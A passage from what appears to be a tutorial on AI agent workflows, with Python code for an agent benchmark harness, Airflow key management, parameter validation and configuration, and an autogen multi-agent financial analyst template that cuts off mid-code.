322 {"role": "user", "content": eval_prompt}
323 ],
324 response_format={"type": "json_object"},
325 temperature=0.3
326 )
327
328 # Parse the result
329 evaluation = json.loads(completion.choices[0].message.content)
330
331 # Calculate metrics
332 scores = [
333 evaluation["workflow_evaluation"]["task_completion"]["score"],
334 evaluation["workflow_evaluation"]["efficiency"]["score"],
335 evaluation["workflow_evaluation"]["agent_collaboration"]["score"],
336 evaluation["workflow_evaluation"]["agent_specialization"]["score"],
337 evaluation["workflow_evaluation"]["error_handling"]["score"],
338 evaluation["workflow_evaluation"]["output_quality"]["score"]
339 ]
340
341 avg_score = sum(scores) / len(scores)
342
343 # Add calculated metrics
344 evaluation["metrics"] = {
345 "average_criteria_score": avg_score,
346 "interaction_count": len(agent_interactions),
347 "agent_count": len(set(interaction.get("agent_name", f"Agent {i}") for i, interaction in enumerate(agent_interactions, 1))),
348 "output_length": len(final_output)
349 }
350
351 return evaluation
352
353 except Exception as e:
354 print(f"Error evaluating multi-agent workflow: {e}")
355 return {
356 "error": str(e),
357 "overall_score": 0,
358 "summary": f"Evaluation failed: {str(e)}"
359 }
360
361 def benchmark_agent(
362 self,
363 agent_function,
364 test_cases: List[Dict[str, Any]],
365 metrics: Optional[List[str]] = None
366 ) -> Dict[str, Any]:
367 """
368 Benchmark an agent against a set of test cases.
369
370 Args:
371 agent_function: Function that takes input and returns agent response
372 test_cases: List of test cases with input and expected output
373 metrics: Optional list of metrics to evaluate
374
375 Returns:
376 Dictionary with benchmark results
377 """
378 if metrics is None:
379 metrics = ["accuracy", "relevance", "completeness"]
380
381 results = []
382
383 for i, test_case in enumerate(test_cases):
384 case_id = test_case.get("id", f"case_{i}")
385 input_data = test_case.get("input", "")
386 expected_output = test_case.get("expected_output", None)
387
388 try:
389 # Run the agent
390 start_time = pd.Timestamp.now()
391 agent_output = agent_function(input_data)
392 end_time = pd.Timestamp.now()
393 duration = (end_time - start_time).total_seconds()
394
395 # Evaluate output
396 evaluation = self.evaluate_agent_output(
397 prompt=input_data,
398 response=agent_output,
399 ground_truth=expected_output,
400 criteria=metrics
401 )
402
403 # Compile results
404 case_result = {
405 "case_id": case_id,
406 "input": input_data,
407 "output": agent_output,
408 "expected_output": expected_output,
409 "execution_time": duration,
410 "evaluation": evaluation,
411 "overall_score": evaluation.get("overall_score", 0)
412 }
413
414 results.append(case_result)
415
416 except Exception as e:
417 print(f"Error in test case {case_id}: {e}")
418 results.append({
419 "case_id": case_id,
420 "input": input_data,
421 "error": str(e),
422 "overall_score": 0
423 })
424
425 # Aggregate results
426 overall_scores = [r.get("overall_score", 0) for r in results if "overall_score" in r]
427 avg_score = sum(overall_scores) / len(overall_scores) if overall_scores else 0
428
429 execution_times = [r.get("execution_time", 0) for r in results if "execution_time" in r]
430 avg_execution_time = sum(execution_times) / len(execution_times) if execution_times else 0
431
432 # Calculate per-metric averages
433 metric_scores = {}
434 for metric in metrics:
435 scores = []
436 for r in results:
437 if "evaluation" in r and "criteria_scores" in r["evaluation"]:
438 if metric in r["evaluation"]["criteria_scores"]:
439 scores.append(r["evaluation"]["criteria_scores"][metric].get("score", 0))
440
441 metric_scores[metric] = sum(scores) / len(scores) if scores else 0
442
443 return {
444 "benchmark_summary": {
445 "test_cases": len(test_cases),
446 "successful_cases": len([r for r in results if "error" not in r and "error" not in r.get("evaluation", {})]),
447 "average_score": avg_score,
448 "average_execution_time": avg_execution_time,
449 "metric_averages": metric_scores
450 },
451 "case_results": results
452 }

Key Advantages:

  1. Enterprise Integration: Agent results and run metadata are stored in Snowflake, where they can be queried alongside existing enterprise data
  2. Robust Scheduling: Airflow handles task scheduling and dependency management
  3. Workflow Monitoring: Airflow's built-in monitoring and alerting cover the AI agent workflows
  4. Data Governance: Snowflake provides data lineage and access governance for agent outputs
  5. Experiment Tracking: MLflow records agent interactions, evaluations, and outputs for each run

Production Considerations:

  1. Securing API Keys:

For production deployment, implement proper API key management:

python
# api_key_management.py
import os
import base64
import json
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from airflow import settings
from airflow.models import Connection, Variable

class APIKeyManager:
    """Securely manage API keys in Airflow."""

    def __init__(self, master_key_env="MASTER_ENCRYPTION_KEY"):
        """
        Initialize the key manager.

        Args:
            master_key_env: Environment variable name for master key
        """
        # Get master key from environment
        master_key = os.environ.get(master_key_env)
        if not master_key:
            raise ValueError(f"Master encryption key not found in environment variable {master_key_env}")

        # Derive encryption key. The salt is a fixed application constant,
        # so the master key itself must be long and random.
        kdf = PBKDF2HMAC(
            algorithm=hashes.SHA256(),
            length=32,
            salt=b'airflow_api_key_manager',
            iterations=100000,
        )
        key = base64.urlsafe_b64encode(kdf.derive(master_key.encode()))
        self.cipher = Fernet(key)

    def encrypt_key(self, api_key):
        """Encrypt an API key."""
        return self.cipher.encrypt(api_key.encode()).decode()

    def decrypt_key(self, encrypted_key):
        """Decrypt an API key."""
        return self.cipher.decrypt(encrypted_key.encode()).decode()

    def store_in_airflow(self, key_name, api_key):
        """Store an encrypted API key in Airflow Variables."""
        encrypted = self.encrypt_key(api_key)
        Variable.set(key_name, encrypted)

    def get_from_airflow(self, key_name):
        """Get and decrypt an API key from Airflow Variables."""
        encrypted = Variable.get(key_name)
        return self.decrypt_key(encrypted)

    def store_connection(self, conn_id, conn_type, host, login, password, port=None, extra=None):
        """Store a connection in Airflow connections (Airflow 2.x metadata database)."""
        # Encrypt sensitive parts. Hooks that read this connection directly will
        # see the encrypted value and must call decrypt_key() before using it.
        encrypted_password = self.encrypt_key(password)

        # Create a new connection object; BaseHook.get_connection() only reads
        # existing connections and raises if conn_id is not defined yet.
        conn = Connection(
            conn_id=conn_id,
            conn_type=conn_type,
            host=host,
            login=login,
            password=encrypted_password,
            port=port,
        )

        if extra:
            # Encrypt extra fields if any
            if isinstance(extra, dict):
                encrypted_extra = {}
                for k, v in extra.items():
                    encrypted_extra[k] = self.encrypt_key(v) if isinstance(v, str) else v
                conn.extra = json.dumps(encrypted_extra)
            else:
                conn.extra = extra

        # Save connection, replacing any existing entry with the same conn_id
        session = settings.Session()
        try:
            session.query(Connection).filter(Connection.conn_id == conn_id).delete()
            session.add(conn)
            session.commit()
        finally:
            session.close()
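
The key manager above derives its Fernet key with a fixed salt. A variation worth considering is a random salt per installation, stored alongside the encrypted values. The sketch below shows the same PBKDF2-HMAC-SHA256 derivation using only the standard library; `derive_fernet_key` is a hypothetical helper, and where the salt is persisted is left as an assumption for the reader's environment.

```python
import base64
import hashlib
import os
from typing import Optional, Tuple


def derive_fernet_key(
    master_key: str, salt: Optional[bytes] = None, iterations: int = 100_000
) -> Tuple[bytes, bytes]:
    """Derive a 32-byte key with PBKDF2-HMAC-SHA256 and return (key, salt).

    The key is URL-safe base64 encoded, which is the format Fernet expects.
    """
    if salt is None:
        # Fresh random salt; it is not secret but must be stored for later use
        salt = os.urandom(16)
    raw = hashlib.pbkdf2_hmac(
        "sha256", master_key.encode(), salt, iterations, dklen=32
    )
    return base64.urlsafe_b64encode(raw), salt


# First use: generate a salt and keep it with the encrypted data
key, salt = derive_fernet_key("example-master-key")

# Later: re-derive the same key from the stored salt
same_key, _ = derive_fernet_key("example-master-key", salt)
print(key == same_key)
```

The returned key can be passed to `Fernet(key)` in place of the one derived in `APIKeyManager.__init__`. The iteration count mirrors the value used above; raising it increases the cost of brute-forcing a weak master key.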

  2. Parameter Management and Validation:

python
# parameter_management.py
from typing import Any, Dict

from marshmallow import Schema, ValidationError, fields, validate, validates


class FinancialAnalysisSchema(Schema):
    """Schema for validating financial analysis parameters."""
    analysis_date = fields.Date(required=True)
    stock_symbols = fields.List(fields.String(), required=True)
    report_type = fields.String(
        required=True,
        validate=validate.OneOf(["standard", "detailed", "executive"]),
    )
    # load_default (marshmallow 3.13+) is the value used when a field is
    # missing from the input; the older `default` only applied when dumping
    include_sentiment = fields.Boolean(load_default=True)
    market_context = fields.Boolean(load_default=True)
    max_stocks = fields.Integer(load_default=10)

    @validates("stock_symbols")
    def validate_symbols(self, symbols, **kwargs):
        """Validate stock symbols."""
        if not symbols:
            raise ValidationError("At least one stock symbol is required")

        if len(symbols) > 20:
            raise ValidationError("Maximum of 20 stock symbols allowed")

        for symbol in symbols:
            # Letters only: tickers with dots or digits (e.g. "BRK.B") are rejected
            if not symbol.isalpha():
                raise ValidationError(f"Invalid stock symbol: {symbol}")


def validate_dag_params(params: Dict[str, Any], schema_class) -> Dict[str, Any]:
    """
    Validate DAG parameters using a schema.

    Args:
        params: Parameters to validate
        schema_class: Schema class for validation

    Returns:
        Validated parameters

    Raises:
        ValueError: If validation fails
    """
    schema = schema_class()
    try:
        # Validate parameters
        return schema.load(params)
    except ValidationError as err:
        error_messages = []
        for field, messages in err.messages.items():
            if isinstance(messages, list):
                error_messages.append(f"{field}: {', '.join(messages)}")
            else:
                error_messages.append(f"{field}: {messages}")

        error_str = "; ".join(error_messages)
        # Chain the original exception so the full marshmallow error stays visible
        raise ValueError(f"Parameter validation failed: {error_str}") from err
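
marshmallow reports errors on list fields as nested dictionaries keyed by item index, so the flat join above prints a raw dict for those fields. The sketch below shows one way to flatten such a structure into readable paths. It uses only the standard library; `flatten_errors` and the sample error dictionary are illustrative assumptions, not part of marshmallow or of the code above.

```python
from typing import Any, List


def flatten_errors(messages: Any, prefix: str = "") -> List[str]:
    """Flatten a nested error structure into 'path: message' strings."""
    if isinstance(messages, dict):
        flat: List[str] = []
        for key, value in messages.items():
            # Build a dotted path such as "stock_symbols.1"
            path = f"{prefix}.{key}" if prefix else str(key)
            flat.extend(flatten_errors(value, path))
        return flat
    if isinstance(messages, (list, tuple)):
        return [f"{prefix}: {', '.join(str(m) for m in messages)}"]
    return [f"{prefix}: {messages}"]


# Hypothetical error payload shaped like ValidationError.messages
example = {
    "analysis_date": ["Not a valid date."],
    "stock_symbols": {1: ["Not a valid string."]},
}
print("; ".join(flatten_errors(example)))
```

A helper like this could replace the loop in `validate_dag_params` if nested field errors need to be surfaced to DAG authors.
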
  1. Airflow Optimizations:

For production Airflow deployments, consider these optimizations:

python
# airflow_config.py
import os


# Recommended Airflow configuration optimizations
def optimize_airflow_config():
    """Apply optimizations to Airflow configuration.

    Variables set here are visible only to the current process and its
    children, so call this (or export the same variables) before launching
    the scheduler, webserver, and workers.
    """
    # Set environment variables
    os.environ["AIRFLOW__CORE__MAX_ACTIVE_RUNS_PER_DAG"] = "1"
    os.environ["AIRFLOW__CORE__PARALLELISM"] = "32"
    # MAX_ACTIVE_TASKS_PER_DAG is the current name of the former DAG_CONCURRENCY
    # option, so only one of the two needs to be set
    os.environ["AIRFLOW__CORE__MAX_ACTIVE_TASKS_PER_DAG"] = "16"
    os.environ["AIRFLOW__SCHEDULER__SCHEDULER_HEARTBEAT_SEC"] = "20"
    os.environ["AIRFLOW__CORE__MIN_SERIALIZED_DAG_UPDATE_INTERVAL"] = "30"
    os.environ["AIRFLOW__CORE__MIN_SERIALIZED_DAG_FETCH_INTERVAL"] = "30"
    # These two matter only on Airflow 1.10.x; DAG serialization is always on in Airflow 2
    os.environ["AIRFLOW__CORE__STORE_DAG_CODE"] = "True"
    os.environ["AIRFLOW__CORE__STORE_SERIALIZED_DAGS"] = "True"
    os.environ["AIRFLOW__CORE__EXECUTE_TASKS_NEW_PYTHON_INTERPRETER"] = "True"

    # Configure Celery executor settings
    os.environ["AIRFLOW__CELERY__WORKER_AUTOSCALE"] = "8,2"  # max,min worker processes
    os.environ["AIRFLOW__CELERY__WORKER_PREFETCH_MULTIPLIER"] = "1"
    os.environ["AIRFLOW__CELERY__TASK_POOL_LIMIT"] = "4"
    os.environ["AIRFLOW__CELERY__OPERATION_TIMEOUT"] = "1800"  # 30 minutes

    # Logging optimizations
    os.environ["AIRFLOW__LOGGING__REMOTE_LOGGING"] = "True"
    os.environ["AIRFLOW__LOGGING__REMOTE_LOG_CONN_ID"] = "aws_default"
    os.environ["AIRFLOW__LOGGING__REMOTE_BASE_LOG_FOLDER"] = "s3://airflow-logs-bucket/logs"

    print("Applied Airflow optimizations")


# Configure resource allocation for specific tasks
def configure_task_resources(ti):
    """Configure resources for specific tasks in the DAG.

    Note: executor_config is normally set on the operator when the DAG is
    defined, and newer Airflow 2 releases expect a `pod_override` entry rather
    than the legacy dictionary used below. Adjust this to your Airflow version.
    """
    task_id = ti.task_id

    # Configure based on task type
    if "analysis" in task_id:
        # Allocate more resources for analysis tasks
        ti.executor_config = {
            "KubernetesExecutor": {
                "request_memory": "4Gi",
                "request_cpu": "2",
                "limit_memory": "8Gi",
                "limit_cpu": "4"
            }
        }
    elif "extract" in task_id:
        # Database-heavy tasks
        ti.executor_config = {
            "KubernetesExecutor": {
                "request_memory": "2Gi",
                "request_cpu": "1",
                "limit_memory": "4Gi",
                "limit_cpu": "2"
            }
        }

    return ti
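
Airflow maps an environment variable named `AIRFLOW__{SECTION}__{KEY}` onto the `key` option of the `[section]` block in `airflow.cfg`. As a minimal sketch of that naming rule, the helper below renders a nested settings dictionary into such variables without touching `os.environ`. The name `airflow_env` and the sample values are assumptions made for illustration.

```python
from typing import Dict, Mapping


def airflow_env(settings: Mapping[str, Mapping[str, object]]) -> Dict[str, str]:
    """Render {section: {key: value}} as AIRFLOW__SECTION__KEY variables."""
    env: Dict[str, str] = {}
    for section, options in settings.items():
        for key, value in options.items():
            # Section and key are upper-cased and joined with double underscores
            env[f"AIRFLOW__{section.upper()}__{key.upper()}"] = str(value)
    return env


overrides = airflow_env({
    "core": {"parallelism": 32, "max_active_runs_per_dag": 1},
    "celery": {"worker_autoscale": "8,2"},
})
for name, value in sorted(overrides.items()):
    print(f"export {name}={value}")
```

Producing the variables as data makes it straightforward to place them in a container spec or deployment manifest, where every Airflow component picks them up at start.
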

This stack is particularly well-suited for organizations that need to:

  • Integrate AI agents with enterprise data platforms
  • Schedule complex AI agent workflows
  • Maintain compliance and governance
  • Track AI agent performance over time
  • Support data-intensive AI processes

4. AI Agent Templates for Real-World Applications

AI-Driven Financial Analyst (Market Data Analysis & Forecasting)

This AI agent template is designed to analyze financial market data, identify trends, and provide forecasting and investment recommendations. It combines market data analysis, sentiment evaluation from news sources, and technical analysis to generate comprehensive financial insights.

Core Capabilities:

  • Historical price analysis and pattern recognition
  • Sector and company fundamental analysis
  • News sentiment integration for market context
  • Technical indicator calculation and interpretation
  • Investment recommendation generation
  • Report creation with visualizations
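
To make the technical indicator capability concrete, here is a minimal sketch in plain Python of a simple moving average and of an RSI based on a plain average of gains and losses (not Wilder's smoothed variant). The function names and sample prices are illustrative assumptions. The flat-window case returns 100 here by choice.

```python
from typing import List, Optional


def sma(values: List[float], window: int) -> Optional[float]:
    """Simple moving average of the last `window` values, or None if too few."""
    if window <= 0 or len(values) < window:
        return None
    return sum(values[-window:]) / window


def rsi(closes: List[float], window: int = 14) -> Optional[float]:
    """RSI from the average gain and loss over the last `window` price changes."""
    if len(closes) < window + 1:
        return None
    changes = [b - a for a, b in zip(closes[:-1], closes[1:])][-window:]
    avg_gain = sum(c for c in changes if c > 0) / window
    avg_loss = sum(-c for c in changes if c < 0) / window
    if avg_loss == 0:
        return 100.0  # no losses in the window
    rs = avg_gain / avg_loss
    return 100 - 100 / (1 + rs)


closes = [10, 11, 12, 11, 12, 13]
print(sma(closes, 3))          # average of 11, 12, 13
print(rsi(closes, window=4))   # three gains and one loss of equal size
```

Readings above 70 are conventionally treated as overbought and below 30 as oversold, which is the kind of interpretation the agent's technical analyst is asked to provide.
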

Architecture:

Financial Analyst Agent Architecture

Implementation Example:

python
# financial_analyst_agent.py
import datetime
import json
import os
from typing import Any, Dict, List

import autogen
import pandas as pd
import requests
import yfinance as yf

# Configure API keys and settings (the fallbacks are placeholders; set real keys in the environment)
OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")
NEWS_API_KEY = os.environ.get("NEWS_API_KEY", "your-api-key")

class FinancialAnalystAgent:
    """
    An AI-driven financial analyst agent that provides comprehensive market analysis,
    trend identification, and investment recommendations.
    """

    def __init__(self, config=None):
        """
        Initialize the Financial Analyst Agent.

        Args:
            config: Optional configuration dictionary
        """
        self.config = config or {}

        # Set up agent configuration
        self.llm_config = {
            "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
            "temperature": 0.2,
            "cache_seed": None  # Disable caching for financial data which changes frequently
        }

        # Create the agent team
        self._create_agent_team()

        # Data cache
        self.data_cache = {}

    def _create_agent_team(self):
        """Create the team of specialized agents for financial analysis."""

        # 1. Market Analyst - Specialized in general market trends and sector analysis
        self.market_analyst = autogen.AssistantAgent(
            name="MarketAnalyst",
            system_message="""You are an expert market analyst who specializes in understanding broad market trends,
            sector rotations, and macroeconomic factors affecting financial markets.

            Your responsibilities:
            1. Analyze overall market conditions and trends
            2. Identify sector strengths and weaknesses
            3. Interpret macroeconomic data and its market impact
            4. Provide context for market movements
            5. Identify market sentiment and risk factors

            Always base your analysis on data and established financial theories. Avoid speculation without evidence.
            Present a balanced view that considers both bullish and bearish perspectives.""",
            llm_config=self.llm_config
        )

        # 2. Technical Analyst - Specialized in chart patterns and technical indicators
        self.technical_analyst = autogen.AssistantAgent(
            name="TechnicalAnalyst",
            system_message="""You are an expert technical analyst who specializes in chart patterns, technical indicators,
            and price action analysis for financial markets.

            Your responsibilities:
            1. Analyze price charts for significant patterns
            2. Calculate and interpret technical indicators
            3. Identify support and resistance levels
            4. Analyze volume patterns and their implications
            5. Provide technical-based forecasts

            Focus on objective technical analysis principles. Clearly explain the reasoning behind your analysis and
            the historical reliability of the patterns you identify. Always consider multiple timeframes.""",
            llm_config={
                **self.llm_config,
                "functions": [
                    {
                        "name": "calculate_technical_indicators",
                        "description": "Calculate technical indicators for a stock",
                        "parameters": {
                            "type": "object",
                            "properties": {
                                "symbol": {"type": "string", "description": "Stock symbol"},
                                "indicators": {"type": "array", "items": {"type": "string"}, "description": "List of indicators to calculate"},
                                "period": {"type": "string", "description": "Time period for analysis (e.g., '1y', '6mo', '3mo')"}
                            },
                            "required": ["symbol", "indicators"]
                        }
                    }
                ]
            }
        )

        # 3. Fundamental Analyst - Specialized in company financial data
        self.fundamental_analyst = autogen.AssistantAgent(
            name="FundamentalAnalyst",
            system_message="""You are an expert fundamental analyst who specializes in analyzing company financial statements,
            valuation metrics, and business models.

            Your responsibilities:
            1. Analyze company financial health and performance
            2. Evaluate valuation metrics against industry peers
            3. Assess growth prospects and business model strengths
            4. Identify financial risks and opportunities
            5. Provide fundamental-based investment recommendations

            Always use established valuation methodologies and accounting principles. Compare companies to their
            historical performance, sector peers, and the broader market. Consider both quantitative metrics
            and qualitative factors.""",
            llm_config=self.llm_config
        )

        # 4. News Sentiment Analyst - Specialized in news and social media sentiment
        self.sentiment_analyst = autogen.AssistantAgent(
            name="SentimentAnalyst",
            system_message="""You are an expert in analyzing news and social media sentiment related to financial markets
            and individual companies.

            Your responsibilities:
            1. Evaluate news sentiment affecting markets or specific stocks
            2. Identify important news catalysts and their potential impact
            3. Detect shifts in market narrative or sentiment
            4. Assess information sources for reliability and importance
            5. Contextualize news within broader market trends

            Focus on objective analysis of sentiment. Distinguish between substantive news and market noise.
            Consider the historical impact of similar news events and sentiment shifts.""",
            llm_config=self.llm_config
        )

        # 5. Portfolio Advisor - Specialized in investment recommendations
        self.portfolio_advisor = autogen.AssistantAgent(
            name="PortfolioAdvisor",
            system_message="""You are an expert investment advisor who specializes in portfolio construction,
            risk management, and investment recommendations.

            Your responsibilities:
            1. Synthesize analyses from other specialists into actionable advice
            2. Provide specific investment recommendations with rationales
            3. Consider risk management and portfolio allocation
            4. Present balanced bull/bear cases for investments
            5. Contextualize recommendations for different investor profiles

            Always include risk factors alongside potential rewards. Provide specific time horizons
            for recommendations when possible. Consider multiple scenarios and their implications.
            Make specific, actionable recommendations rather than general statements.""",
            llm_config=self.llm_config
        )

        # 6. Report Writer - Specialized in creating comprehensive reports
        self.report_writer = autogen.AssistantAgent(
            name="ReportWriter",
            system_message="""You are an expert financial report writer who specializes in synthesizing complex
            financial analyses into clear, structured reports.

            Your responsibilities:
            1. Organize analyses into a coherent narrative
            2. Create executive summaries that highlight key points
            3. Structure information logically with appropriate sections
            4. Maintain professional financial writing standards
            5. Ensure reports are comprehensive yet accessible

            Use clear financial terminology and explain complex concepts when necessary. Include all relevant
            information while avoiding unnecessary repetition. Organize content with appropriate headings
            and structure. Always include an executive summary and conclusion.""",
            llm_config=self.llm_config
        )

        # User proxy agent for orchestrating the workflow
        self.user_proxy = autogen.UserProxyAgent(
            name="FinancialDataManager",
            human_input_mode="NEVER",
            code_execution_config={
                "work_dir": "financial_analysis_workspace",
                "use_docker": False,
                "last_n_messages": 3
            },
            system_message="""You are a financial data manager that coordinates the financial analysis process.
            Your role is to gather data, distribute it to the specialized analysts, and compile their insights.
            You can execute Python code to fetch and process financial data."""
        )

        # Register the function declared in the TechnicalAnalyst's llm_config so
        # the proxy can execute it when the analyst suggests a call
        self.user_proxy.register_function(
            function_map={
                "calculate_technical_indicators": self.calculate_technical_indicators
            }
        )

    def fetch_market_data(self, symbols: List[str], period: str = "1y") -> Dict[str, pd.DataFrame]:
        """
        Fetch market data for specified symbols.

        Args:
            symbols: List of stock symbols
            period: Time period for data (e.g., '1d', '5d', '1mo', '3mo', '6mo', '1y', '2y', '5y', '10y', 'ytd', 'max')

        Returns:
            Dictionary of DataFrames with market data
        """
        results = {}

        # Check cache first
        cache_key = f"{','.join(symbols)}_{period}"
        if cache_key in self.data_cache:
            return self.data_cache[cache_key]

        # Fetch data for each symbol
        for symbol in symbols:
            try:
                stock = yf.Ticker(symbol)
                hist = stock.history(period=period)

                if not hist.empty:
                    # Calculate returns
                    hist['Daily_Return'] = hist['Close'].pct_change()
                    hist['Cumulative_Return'] = (1 + hist['Daily_Return']).cumprod() - 1

                    # Calculate volatility (20-day rolling standard deviation of returns)
                    hist['Volatility_20d'] = hist['Daily_Return'].rolling(window=20).std()

                    # Add some basic technical indicators
                    # 20-day and 50-day moving averages
                    hist['MA20'] = hist['Close'].rolling(window=20).mean()
                    hist['MA50'] = hist['Close'].rolling(window=50).mean()

                    # Relative Strength Index (RSI), using a simple 14-day rolling
                    # mean of gains and losses rather than Wilder's smoothing
                    delta = hist['Close'].diff()
                    gain = (delta.where(delta > 0, 0)).rolling(window=14).mean()
                    loss = (-delta.where(delta < 0, 0)).rolling(window=14).mean()
                    rs = gain / loss
                    hist['RSI'] = 100 - (100 / (1 + rs))

                    results[symbol] = hist
            except Exception as e:
                print(f"Error fetching data for {symbol}: {e}")

        # Store in cache
        self.data_cache[cache_key] = results

        return results

    def fetch_fundamental_data(self, symbols: List[str]) -> Dict[str, Dict[str, Any]]:
        """
        Fetch fundamental data for specified symbols.

        Args:
            symbols: List of stock symbols

        Returns:
            Dictionary of fundamental data by symbol
        """
        results = {}

        for symbol in symbols:
            try:
                stock = yf.Ticker(symbol)

                # Get key statistics
                info = stock.info

                # Get financial data
                try:
                    income_stmt = stock.income_stmt
                    balance_sheet = stock.balance_sheet
                    cash_flow = stock.cashflow

                    financials = {
                        "income_statement": income_stmt.to_dict() if not income_stmt.empty else {},
                        "balance_sheet": balance_sheet.to_dict() if not balance_sheet.empty else {},
                        "cash_flow": cash_flow.to_dict() if not cash_flow.empty else {}
                    }
                except Exception:
                    # Statements are optional; fall back to an empty set
                    financials = {}

                # Compile results
                results[symbol] = {
                    "info": info,
                    "financials": financials
                }
            except Exception as e:
                print(f"Error fetching fundamental data for {symbol}: {e}")

        return results

    def fetch_news_data(self, symbols: List[str], days: int = 7) -> Dict[str, List[Dict[str, Any]]]:
        """
        Fetch news articles for specified symbols.

        Args:
            symbols: List of stock symbols
            days: Number of days to look back

        Returns:
            Dictionary of news articles by symbol
        """
        results = {}

        for symbol in symbols:
            try:
                # Format date range
                end_date = datetime.datetime.now()
                start_date = end_date - datetime.timedelta(days=days)

                # Get company name for better search results
                try:
                    stock = yf.Ticker(symbol)
                    company_name = stock.info.get("shortName", symbol)
                except Exception:
                    company_name = symbol

                # Construct query
                query = f"{company_name} OR {symbol} stock"

                # Fetch news from NewsAPI. Passing params lets requests URL-encode
                # the query, which matters for names containing "&" or spaces.
                response = requests.get(
                    "https://newsapi.org/v2/everything",
                    params={
                        "q": query,
                        "from": start_date.strftime('%Y-%m-%d'),
                        "to": end_date.strftime('%Y-%m-%d'),
                        "language": "en",
                        "sortBy": "relevancy",
                        "pageSize": 10,
                        "apiKey": NEWS_API_KEY,
                    },
                    timeout=10,
                )
                if response.status_code == 200:
                    news_data = response.json()
                    articles = news_data.get("articles", [])

                    # Process articles
                    processed_articles = []
                    for article in articles:
                        processed_articles.append({
                            "title": article.get("title", ""),
                            "source": article.get("source", {}).get("name", ""),
                            "published_at": article.get("publishedAt", ""),
                            "url": article.get("url", ""),
                            "description": article.get("description", "")
                        })

                    results[symbol] = processed_articles
                else:
                    print(f"Error fetching news for {symbol}: {response.status_code}")
                    results[symbol] = []
            except Exception as e:
                print(f"Error fetching news for {symbol}: {e}")
                results[symbol] = []

        return results

    def calculate_technical_indicators(self, symbol: str, indicators: List[str], period: str = "1y") -> Dict[str, Any]:
        """
        Calculate technical indicators for a stock.

        Args:
            symbol: Stock symbol
            indicators: List of indicators to calculate
            period: Time period for data

        Returns:
            Dictionary of technical indicators
        """
        try:
            # Fetch data
            data = self.fetch_market_data([symbol], period).get(symbol)
            if data is None or data.empty:
                return {"error": f"No data available for {symbol}"}

            results = {}

            for indicator in indicators:
                indicator = indicator.lower()

                # Window size from the indicator name (e.g., "ma20" -> "20", "sma50" -> "50")
                ma_window = indicator[3:] if indicator.startswith("sma") else indicator[2:]

                # Moving Averages. A numeric suffix is required so that "macd"
                # falls through to its own branch instead of matching "ma".
                if indicator.startswith(("ma", "sma")) and ma_window.isdigit():
                    try:
                        window = int(ma_window)
                        data[f'MA{window}'] = data['Close'].rolling(window=window).mean()
                        # Get the most recent value
                        results[f'MA{window}'] = data[f'MA{window}'].iloc[-1]
                    except Exception:
                        results[indicator] = None

                # Exponential Moving Average
                elif indicator.startswith("ema"):
                    try:
                        window = int(indicator[3:])
                        data[f'EMA{window}'] = data['Close'].ewm(span=window, adjust=False).mean()
                        results[f'EMA{window}'] = data[f'EMA{window}'].iloc[-1]
                    except Exception:
                        results[indicator] = None

                # RSI - Relative Strength Index
                elif indicator == "rsi":
                    try:
                        delta = data['Close'].diff()
                        gain = (delta.where(delta > 0, 0)).rolling(window=14).mean()
                        loss = (-delta.where(delta < 0, 0)).rolling(window=14).mean()
                        rs = gain / loss
                        data['RSI'] = 100 - (100 / (1 + rs))
                        results['RSI'] = data['RSI'].iloc[-1]
                    except Exception:
                        results['RSI'] = None

                # MACD - Moving Average Convergence Divergence
                elif indicator == "macd":
                    try:
                        exp1 = data['Close'].ewm(span=12, adjust=False).mean()
                        exp2 = data['Close'].ewm(span=26, adjust=False).mean()
                        data['MACD'] = exp1 - exp2
                        data['Signal_Line'] = data['MACD'].ewm(span=9, adjust=False).mean()
                        data['MACD_Histogram'] = data['MACD'] - data['Signal_Line']

                        results['MACD'] = {
                            'MACD_Line': data['MACD'].iloc[-1],
                            'Signal_Line': data['Signal_Line'].iloc[-1],
                            'Histogram': data['MACD_Histogram'].iloc[-1]
                        }
                    except Exception:
                        results['MACD'] = None

                # Bollinger Bands (20-day mean plus/minus two standard deviations)
                elif indicator == "bollinger" or indicator == "bb":
                    try:
                        window = 20
                        data['MA20'] = data['Close'].rolling(window=window).mean()
                        data['BB_Upper'] = data['MA20'] + (data['Close'].rolling(window=window).std() * 2)
                        data['BB_Lower'] = data['MA20'] - (data['Close'].rolling(window=window).std() * 2)

                        results['Bollinger_Bands'] = {
                            'Upper': data['BB_Upper'].iloc[-1],
                            'Middle': data['MA20'].iloc[-1],
                            'Lower': data['BB_Lower'].iloc[-1],
                            'Width': (data['BB_Upper'].iloc[-1] - data['BB_Lower'].iloc[-1]) / data['MA20'].iloc[-1]
                        }
                    except Exception:
                        results['Bollinger_Bands'] = None

                # Average True Range (ATR)
                elif indicator == "atr":
                    try:
                        high_low = data['High'] - data['Low']
                        high_close = (data['High'] - data['Close'].shift()).abs()
                        low_close = (data['Low'] - data['Close'].shift()).abs()
                        ranges = pd.concat([high_low, high_close, low_close], axis=1)
                        true_range = ranges.max(axis=1)
                        data['ATR'] = true_range.rolling(14).mean()
                        results['ATR'] = data['ATR'].iloc[-1]
                    except Exception:
                        results['ATR'] = None

                # Volume-Weighted Average Price (VWAP), cumulative over the whole period
                elif indicator == "vwap":
                    try:
                        typical_price = (data['High'] + data['Low'] + data['Close']) / 3
                        data['VWAP'] = (typical_price * data['Volume']).cumsum() / data['Volume'].cumsum()
                        results['VWAP'] = data['VWAP'].iloc[-1]
                    except Exception:
                        results['VWAP'] = None

            # Add the current price for reference
            results['Current_Price'] = data['Close'].iloc[-1]

            return results

        except Exception as e:
            return {"error": str(e)}

    def analyze_stock(
        self,
        symbol: str,
        period: str = "1y",
        include_news: bool = True,
        include_fundamentals: bool = True,
        report_type: str = "standard"
    ) -> Dict[str, Any]:
        """
        Perform a comprehensive analysis of a stock.

        Args:
            symbol: Stock symbol to analyze
            period: Time period for analysis
            include_news: Whether to include news analysis
            include_fundamentals: Whether to include fundamental analysis
            report_type: Type of report (standard, detailed, executive)

        Returns:
            Dictionary with comprehensive analysis
        """
        # Gather data
        market_data = self.fetch_market_data([symbol], period)
        if symbol not in market_data:
            return {"error": f"No data available for {symbol}"}

        # Create group chat for agent collaboration
        groupchat = autogen.GroupChat(
            agents=[
                self.user_proxy,
                self.market_analyst,
                self.technical_analyst,
                self.fundamental_analyst,
                self.sentiment_analyst,
                self.portfolio_advisor,
                self.report_writer
            ],
            messages=[],
            max_round=12
        )

